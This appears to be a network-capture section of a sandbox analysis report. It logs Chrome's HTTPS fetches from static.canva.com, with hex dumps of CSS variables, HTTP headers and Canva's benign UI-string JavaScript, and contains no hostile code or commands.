                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 2e 31 35 29 3b 2d 2d 54 77 69 4c 63 67 3a 72 67 62 61 28 31 33 2c 31 38 2c 32 32 2c 30 29 3b 2d 2d 51 65 51 30 44 77 3a 23 30 64 31 32 31 36 3b 2d 2d 54 5a 4f 49 37 41 3a 72 67 62 61 28 33 36 2c 34 39 2c 36 31 2c 2e 34 29 3b 2d 2d 53 5a 4d 6b 58 41 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 31 35 29 3b 2d 2d 31 7a 65 73 45 41 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 31 35 29 3b 2d 2d 41 4d 78 52 67 77 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 32 29 3b 2d 2d 42 5a 36 30 4a 77 3a 72 67 62 61 28 36 34 2c 38 37 2c 31 30 39 2c 2e 30 37 29 3b 2d 2d 38 45 78 35 67 41 3a 23 36 31 32 64 61 65 3b 2d 2d 73 70 49 50 32 41 3a 72 67 62 61 28 33 36 2c 34 39 2c 36 31 2c 2e 34 29 3b 2d 2d 4b 74 58 6c 52 67 3a 72 67 62 61 28 31
                                                                                                                                                                                                                                                                    Data Ascii: .15);--TwiLcg:rgba(13,18,22,0);--QeQ0Dw:#0d1216;--TZOI7A:rgba(36,49,61,.4);--SZMkXA:rgba(165,112,255,.15);--1zesEA:rgba(165,112,255,.15);--AMxRgw:rgba(165,112,255,.2);--BZ60Jw:rgba(64,87,109,.07);--8Ex5gA:#612dae;--spIP2A:rgba(36,49,61,.4);--KtXlRg:rgba(1
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 67 62 61 28 33 36 2c 34 39 2c 36 31 2c 2e 34 29 3b 2d 2d 54 70 35 34 56 77 3a 23 66 30 66 31 66 35 3b 2d 2d 70 66 5f 4a 52 51 3a 72 67 62 61 28 32 34 30 2c 32 34 31 2c 32 34 35 2c 2e 37 29 3b 2d 2d 79 73 35 58 47 67 3a 72 67 62 61 28 32 34 30 2c 32 34 31 2c 32 34 35 2c 30 29 3b 2d 2d 64 56 75 63 4a 77 3a 23 66 36 66 37 66 38 3b 2d 2d 75 36 56 55 4c 67 3a 72 67 62 61 28 32 34 36 2c 32 34 37 2c 32 34 38 2c 2e 37 29 3b 2d 2d 63 6d 35 4f 65 51 3a 72 67 62 61 28 32 34 36 2c 32 34 37 2c 32 34 38 2c 30 29 3b 2d 2d 43 2d 71 36 49 67 3a 23 66 66 66 3b 2d 2d 50 6a 36 47 5a 51 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 37 29 3b 2d 2d 72 36 4d 48 58 51 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 30 29 3b 2d 2d 34 52 61 53 6a 67 3a 23 66 66 66 3b 2d 2d 46
                                                                                                                                                                                                                                                                    Data Ascii: gba(36,49,61,.4);--Tp54Vw:#f0f1f5;--pf_JRQ:rgba(240,241,245,.7);--ys5XGg:rgba(240,241,245,0);--dVucJw:#f6f7f8;--u6VULg:rgba(246,247,248,.7);--cm5OeQ:rgba(246,247,248,0);--C-q6Ig:#fff;--Pj6GZQ:hsla(0,0%,100%,.7);--r6MHXQ:hsla(0,0%,100%,0);--4RaSjg:#fff;--F
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 28 30 2c 30 25 2c 31 30 30 25 2c 2e 31 35 29 3b 2d 2d 54 77 69 4c 63 67 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 30 29 3b 2d 2d 51 65 51 30 44 77 3a 23 66 66 66 3b 2d 2d 54 5a 4f 49 37 41 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 34 29 3b 2d 2d 53 5a 4d 6b 58 41 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 33 29 3b 2d 2d 31 7a 65 73 45 41 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 33 29 3b 2d 2d 41 4d 78 52 67 77 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 32 29 3b 2d 2d 42 5a 36 30 4a 77 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 31 35 29 3b 2d 2d 38 45 78 35 67 41 3a 23 66 66 66 3b 2d 2d 73 70 49 50 32 41 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 34 29 3b 2d 2d 4b 74 58 6c 52 67 3a
                                                                                                                                                                                                                                                                    Data Ascii: (0,0%,100%,.15);--TwiLcg:hsla(0,0%,100%,0);--QeQ0Dw:#fff;--TZOI7A:hsla(0,0%,100%,.4);--SZMkXA:rgba(165,112,255,.3);--1zesEA:rgba(165,112,255,.3);--AMxRgw:rgba(165,112,255,.2);--BZ60Jw:hsla(0,0%,100%,.15);--8Ex5gA:#fff;--spIP2A:hsla(0,0%,100%,.4);--KtXlRg:
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1230INData Raw: 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 34 29 3b 2d 2d 54 70 35 34 56 77 3a 23 30 64 31 32 31 36 3b 2d 2d 70 66 5f 4a 52 51 3a 72 67 62 61 28 31 33 2c 31 38 2c 32 32 2c 2e 37 29 3b 2d 2d 79 73 35 58 47 67 3a 72 67 62 61 28 31 33 2c 31 38 2c 32 32 2c 30 29 3b 2d 2d 64 56 75 63 4a 77 3a 23 31 38 31 39 31 62 3b 2d 2d 75 36 56 55 4c 67 3a 72 67 62 61 28 32 34 2c 32 35 2c 32 37 2c 2e 37 29 3b 2d 2d 63 6d 35 4f 65 51 3a 72 67 62 61 28 32 34 2c 32 35 2c 32 37 2c 30 29 3b 2d 2d 43 2d 71 36 49 67 3a 23 31 38 31 39 31 62 3b 2d 2d 50 6a 36 47 5a 51 3a 72 67 62 61 28 32 34 2c 32 35 2c 32 37 2c 2e 37 29 3b 2d 2d 72 36 4d 48 58 51 3a 72 67 62 61 28 32 34 2c 32 35 2c 32 37 2c 30 29 3b 2d 2d 34 52 61 53 6a 67 3a 23 32 35 32 36 32 37 3b 2d 2d 46 36 46 32 4e 51 3a 72 67 62
                                                                                                                                                                                                                                                                    Data Ascii: a(0,0%,100%,.4);--Tp54Vw:#0d1216;--pf_JRQ:rgba(13,18,22,.7);--ys5XGg:rgba(13,18,22,0);--dVucJw:#18191b;--u6VULg:rgba(24,25,27,.7);--cm5OeQ:rgba(24,25,27,0);--C-q6Ig:#18191b;--Pj6GZQ:rgba(24,25,27,.7);--r6MHXQ:rgba(24,25,27,0);--4RaSjg:#252627;--F6F2NQ:rgb


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    6192.168.2.1249725104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC566OUTGET /web/bc9c3915a07295cb.en.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1354INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:30 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 641
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950ce68847c90-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 49970
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "07254cd7d8e452943780b1bae736704b"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:16 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:22 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: Wpaf87NTW52xw1VxaibKkjb9s9Lzn3pcmYGZUAOoBoAQD9NvywBid10tgBlh4TfMgPEKJ8LQh2s=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: C6NEEA0A8BZVN3E8
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: YTZ6s2yikn9mBj01X4VLhIxGTypRbUvC
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC781INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 39 52 39 74 77 54 5f 5f 4f 67 66 42 36 72 6a 73 7a 56 31 73 57 5a 46 33 7a 5a 6e 67 58 4f 5f 6d 66 37 46 6b 77 72 4c 6b 58 7a 55 2d 31 37 33 32 31 31 34 38 39 30 2d 31 2e 30 2e 31 2e 31 2d 6e 6c 37 66 5f 4f 6e 58 5a 4d 58 59 75 6d 75 47 61 68 33 6e 2e 5a 50 44 65 68 6e 56 4d 7a 71 32 49 53 5f 2e 79 71 68 6b 71 6d 50 36 43 49 67 5a 76 5a 68 45 6b 67 4c 33 52 4a 56 5f 6e 68 78 4c 34 49 6a 57 52 55 32 42 6a 35 30 31 76 42 33 70 39 68 54 48 56 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 33 30 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=9R9twT__OgfB6rjszV1sWZF3zZngXO_mf7FkwrLkXzU-1732114890-1.0.1.1-nl7f_OnXZMXYumuGah3n.ZPDehnVMzq2IS_.yqhkqmP6CIgZvZhEkgL3RJV_nhxL4IjWRU2Bj501vB3p9hTHVw; path=/; expires=Wed, 20-Nov-24 15:31:30 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC603INData Raw: 77 69 6e 64 6f 77 5b 27 63 6d 73 67 27 5d 5b 27 61 73 73 65 74 73 27 5d 20 3d 20 77 69 6e 64 6f 77 5b 27 63 6d 73 67 27 5d 5b 27 61 73 73 65 74 73 27 5d 20 7c 7c 20 7b 7d 3b 0a 77 69 6e 64 6f 77 5b 27 63 6d 73 67 27 5d 5b 27 61 73 73 65 74 73 27 5d 5b 22 65 6e 22 5d 20 3d 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 77 69 6e 64 6f 77 5b 27 63 6d 73 67 27 5d 5b 27 61 73 73 65 74 73 27 5d 5b 22 65 6e 22 5d 20 7c 7c 20 7b 7d 2c 20 7b 22 31 35 38 22 3a 7b 22 6a 73 22 3a 5b 22 39 66 34 35 32 39 35 65 32 38 38 66 37 62 33 33 2e 73 74 72 69 6e 67 73 2e 6a 73 22 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 31 30 30 38 22 3a 7b 22 6a 73 22 3a 5b 22 33 35 33 61 33 63 62 61 35 35 62 66 61 30 34 36 2e 73 74 72 69 6e 67 73 2e 6a 73 22 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22
                                                                                                                                                                                                                                                                    Data Ascii: window['cmsg']['assets'] = window['cmsg']['assets'] || {};window['cmsg']['assets']["en"] = Object.assign(window['cmsg']['assets']["en"] || {}, {"158":{"js":["9f45295e288f7b33.strings.js"],"css":[]},"1008":{"js":["353a3cba55bfa046.strings.js"],"css":[]},"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC38INData Raw: 37 38 30 64 63 35 35 30 62 64 65 30 2e 73 74 72 69 6e 67 73 2e 6a 73 22 5d 2c 22 63 73 73 22 3a 5b 5d 7d 7d 29 3b
                                                                                                                                                                                                                                                                    Data Ascii: 780dc550bde0.strings.js"],"css":[]}});


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    7192.168.2.1249724104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC571OUTGET /web/1c5520ae304c8de4.strings.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1355INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:30 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 19628
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950ce6a2fde95-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 49969
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "c261587fc6da6c6fcd58cc2a945ba8a4"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:15 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:13 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: FdAM1qyI+KCXDehrSkuSdtIGDO7/gWzJ+SrrgAxpoekbxiiRmBHQbm61fuihTPWdURH6T2qYpG4AjPPdcoW1rr+mx3idvSCtiXNxOff11+A=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: C6N6H9EASB47YPXP
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: Rbp0zw_Czn_plh1TENpsulMAThyjeEIj
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC802INData Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 4d 79 62 74 4f 41 72 6d 77 6f 4f 34 78 78 46 41 2e 6c 46 35 45 45 61 6e 41 53 4f 70 42 47 66 69 36 55 43 77 72 35 67 6a 73 55 77 2d 31 37 33 32 31 31 34 38 39 30 2d 31 2e 30 2e 31 2e 31 2d 77 67 79 49 6d 54 66 37 34 32 4b 35 70 71 54 6e 5f 76 36 2e 75 31 41 4a 58 73 75 4a 75 6c 70 43 59 71 45 5a 50 6f 52 71 68 48 30 7a 6f 6b 59 79 64 44 52 44 4b 78 2e 70 31 67 4e 34 59 4f 76 6f 55 5f 79 74 58 39 6d 34 75 51 74 34 31 2e 54 53 74 33 64 57 2e 41 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 33 30 20 47 4d 54 3b 20 64 6f 6d 61 69 6e
                                                                                                                                                                                                                                                                    Data Ascii: X-Content-Type-Options: nosniffSet-Cookie: __cf_bm=MybtOArmwoO4xxFA.lF5EEanASOpBGfi6UCwr5gjsUw-1732114890-1.0.1.1-wgyImTf742K5pqTn_v6.u1AJXsuJulpCYqEZPoRqhH0zokYydDRDKx.p1gN4YOvoU_ytX9m4uQt41.TSt3dW.A; path=/; expires=Wed, 20-Nov-24 15:31:30 GMT; domain
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC581INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 63 6f 6e 73 74 20 6d 65 73 73 61 67 65 73 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 22 7b 5c 22 65 71 34 50 67 41 5c 22 3a 5c 22 44 69 64 6e e2 80 99 74 20 67 65 74 20 74 68 65 20 63 6f 64 65 3f 20 52 65 73 65 6e 64 20 63 6f 64 65 5c 22 2c 5c 22 69 6e 37 67 7a 77 5c 22 3a 5c 22 e2 80 8e 7b 30 7d 20 e2 86 92 20 7b 31 7d 5c 22 2c 5c 22 42 51 6b 4f 43 51 5c 22 3a 5c 22 7b 30 7d 4b 5c 22 2c 5c 22 69 47 41 44 73 67 5c 22 3a 5c 22 53 6b 69 70 20 74 6f 20 73 65 61 72 63 68 5c 22 2c 5c 22 6d 59 44 31 4a 67 5c 22 3a 5c 22 43 6f 6e 66 69 72 6d 5c 22 2c 5c 22 50 46 4f 55 65 77 5c 22 3a 5c 22 43 6f 6e 74 69 6e 75 65 5c 22 2c 5c 22 46 76 59 75 37 51 5c 22 3a 5c 22 54 68 69 73 20 70 61 73 73 77 6f 72 64 20 69 73 20 63 6f 6d
                                                                                                                                                                                                                                                                    Data Ascii: (function() { const messages = JSON.parse("{\"eq4PgA\":\"Didnt get the code? Resend code\",\"in7gzw\":\"{0} {1}\",\"BQkOCQ\":\"{0}K\",\"iGADsg\":\"Skip to search\",\"mYD1Jg\":\"Confirm\",\"PFOUew\":\"Continue\",\"FvYu7Q\":\"This password is com
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 6f 75 72 20 70 61 73 73 77 6f 72 64 5c 22 2c 5c 22 62 53 41 35 71 41 5c 22 3a 5c 22 54 6f 20 70 72 6f 74 65 63 74 20 79 6f 75 72 20 70 72 69 76 61 63 79 20 77 65 20 63 61 6e e2 80 99 74 20 61 6c 6c 6f 77 20 79 6f 75 20 74 6f 20 63 72 65 61 74 65 20 61 20 43 61 6e 76 61 20 61 63 63 6f 75 6e 74 20 79 6f 75 72 73 65 6c 66 2e 5c 22 2c 5c 22 4c 45 34 4d 65 51 5c 22 3a 5c 22 45 73 63 5c 22 2c 5c 22 55 59 2f 65 50 41 5c 22 3a 5c 22 7b 30 7d 4d 5c 22 2c 5c 22 71 34 4f 57 36 41 5c 22 3a 5c 22 59 6f 75 72 20 62 69 72 74 68 64 61 79 20 63 61 6e e2 80 99 74 20 62 65 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 5c 22 2c 5c 22 65 4b 58 69 53 51 5c 22 3a 5c 22 50 61 73 73 77 6f 72 64 5c 22 2c 5c 22 2f 66 4c 4e 48 67 5c 22 3a 5c 22 57 68 65 6e 20 79 6f 75 20 73 65 74 20 75
                                                                                                                                                                                                                                                                    Data Ascii: our password\",\"bSA5qA\":\"To protect your privacy we cant allow you to create a Canva account yourself.\",\"LE4MeQ\":\"Esc\",\"UY/ePA\":\"{0}M\",\"q4OW6A\":\"Your birthday cant be in the future\",\"eKXiSQ\":\"Password\",\"/fLNHg\":\"When you set u
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 64 61 79 7d 20 6f 74 68 65 72 20 7b 23 20 64 61 79 73 7d 7d 2e 5c 22 2c 5c 22 36 72 77 32 70 41 5c 22 3a 5c 22 54 68 61 6e 6b 73 20 66 6f 72 20 77 61 74 63 68 69 6e 67 21 5c 22 2c 5c 22 39 5a 58 4f 6f 67 5c 22 3a 5c 22 47 6f 20 74 6f 20 70 61 67 65 5c 22 2c 5c 22 53 73 65 30 69 41 5c 22 3a 5c 22 53 6f 72 72 79 2c 20 77 65 20 68 61 64 20 74 72 6f 75 62 6c 65 20 73 65 6e 64 69 6e 67 20 79 6f 75 72 20 63 6f 64 65 2e 20 50 6c 65 61 73 65 20 63 6f 6d 65 20 62 61 63 6b 20 6c 61 74 65 72 20 74 6f 20 74 72 79 20 74 68 69 73 20 61 67 61 69 6e 2e 5c 22 2c 5c 22 36 31 35 68 6a 41 5c 22 3a 5c 22 43 68 6f 6f 73 65 20 61 20 64 69 66 66 65 72 65 6e 74 20 73 69 67 6e 75 70 20 6d 65 74 68 6f 64 5c 22 2c 5c 22 74 72 69 6e 77 67 5c 22 3a 5c 22 50 72 65 76 69 6f 75 73 5c 22
                                                                                                                                                                                                                                                                    Data Ascii: day} other {# days}}.\",\"6rw2pA\":\"Thanks for watching!\",\"9ZXOog\":\"Go to page\",\"Sse0iA\":\"Sorry, we had trouble sending your code. Please come back later to try this again.\",\"615hjA\":\"Choose a different signup method\",\"trinwg\":\"Previous\"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 6c 20 6c 61 74 65 72 3c 2f 62 75 74 74 6f 6e 3e 5c 22 2c 5c 22 32 37 47 35 79 67 5c 22 3a 5c 22 50 61 75 73 65 5c 22 2c 5c 22 52 47 4a 4d 55 77 5c 22 3a 5c 22 52 65 63 65 6e 74 20 79 65 61 72 73 20 61 72 65 20 65 61 73 79 20 74 6f 20 67 75 65 73 73 2e 5c 22 2c 5c 22 38 2f 37 72 51 51 5c 22 3a 5c 22 41 75 67 75 73 74 5c 22 2c 5c 22 68 7a 42 41 52 41 5c 22 3a 5c 22 46 69 6e 69 73 68 20 6c 6f 67 67 69 6e 67 20 69 6e 5c 22 2c 5c 22 61 73 63 6f 48 41 5c 22 3a 5c 22 44 61 74 65 20 6f 66 20 42 69 72 74 68 5c 22 2c 5c 22 6e 68 63 2f 34 67 5c 22 3a 5c 22 43 6f 6d 6d 65 6e 74 5c 22 2c 5c 22 79 70 68 47 57 67 5c 22 3a 5c 22 43 61 6e 76 61 5c 22 2c 5c 22 35 52 67 77 64 67 5c 22 3a 5c 22 43 6f 6e 74 69 6e 75 65 5c 22 2c 5c 22 61 74 4c 46 50 67 5c 22 3a 5c 22 50 6c 65
                                                                                                                                                                                                                                                                    Data Ascii: l later</button>\",\"27G5yg\":\"Pause\",\"RGJMUw\":\"Recent years are easy to guess.\",\"8/7rQQ\":\"August\",\"hzBARA\":\"Finish logging in\",\"ascoHA\":\"Date of Birth\",\"nhc/4g\":\"Comment\",\"yphGWg\":\"Canva\",\"5Rgwdg\":\"Continue\",\"atLFPg\":\"Ple
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 5c 22 3a 5c 22 49 6e 63 6f 72 72 65 63 74 5c 22 2c 5c 22 74 33 38 78 45 77 5c 22 3a 5c 22 59 6f 75 72 20 62 72 6f 77 73 65 72 20 68 61 73 20 63 6f 6f 6b 69 65 73 20 64 69 73 61 62 6c 65 64 2e 20 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 20 74 6f 20 75 73 65 20 43 61 6e 76 61 2e 5c 22 2c 5c 22 57 76 73 71 31 51 5c 22 3a 5c 22 47 6f 20 74 6f 20 74 68 65 20 70 72 65 76 69 6f 75 73 20 79 65 61 72 20 72 61 6e 67 65 5c 22 2c 5c 22 6c 6b 54 48 33 67 5c 22 3a 5c 22 28 6f 70 74 69 6f 6e 61 6c 29 5c 22 2c 5c 22 50 57 48 65 62 41 5c 22 3a 5c 22 50 65 72 66 6f 72 6d 20 f0 9f 91 8f 20 72 65 61 63 74 69 6f 6e 5c 22 2c 5c 22 72 75 57 4e 39 41 5c 22 3a 5c 22 53 65 6c 65 63 74 20 61 6c 6c 20 72 6f 77 73 20 61 6e 64 20 63 6f 6c 75 6d 6e 73 5c 22 2c 5c
                                                                                                                                                                                                                                                                    Data Ascii: \":\"Incorrect\",\"t38xEw\":\"Your browser has cookies disabled. Please enable cookies to use Canva.\",\"Wvsq1Q\":\"Go to the previous year range\",\"lkTH3g\":\"(optional)\",\"PWHebA\":\"Perform reaction\",\"ruWN9A\":\"Select all rows and columns\",\
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 74 6f 20 73 75 69 74 20 79 6f 75 72 20 64 65 76 69 63 65 e2 80 99 73 20 61 63 63 65 73 73 69 62 69 6c 69 74 79 20 70 72 65 66 65 72 65 6e 63 65 73 2e 5c 22 2c 5c 22 31 32 30 53 6e 41 5c 22 3a 5c 22 43 72 65 61 74 65 64 20 62 79 20 7b 30 7d 5c 22 2c 5c 22 74 66 38 57 50 77 5c 22 3a 5c 22 53 6c 69 64 65 5c 22 2c 5c 22 57 30 6a 67 46 41 5c 22 3a 5c 22 4d 65 64 69 75 6d 5c 22 2c 5c 22 31 34 57 46 67 41 5c 22 3a 5c 22 57 65 20 64 69 64 6e e2 80 99 74 20 66 69 6e 64 20 61 20 43 61 6e 76 61 20 61 63 63 6f 75 6e 74 20 66 6f 72 20 7b 30 7d 20 73 6f 20 77 65 e2 80 99 6c 6c 20 6d 61 6b 65 20 6f 6e 65 20 66 6f 72 20 79 6f 75 2e 20 45 6e 74 65 72 20 74 68 65 20 63 6f 64 65 20 77 65 20 73 65 6e 74 20 74 6f 20 66 69 6e 69 73 68 20 73 69 67 6e 69 6e 67 20 75 70 2e 5c 22
                                                                                                                                                                                                                                                                    Data Ascii: to suit your devices accessibility preferences.\",\"120SnA\":\"Created by {0}\",\"tf8WPw\":\"Slide\",\"W0jgFA\":\"Medium\",\"14WFgA\":\"We didnt find a Canva account for {0} so well make one for you. Enter the code we sent to finish signing up.\"
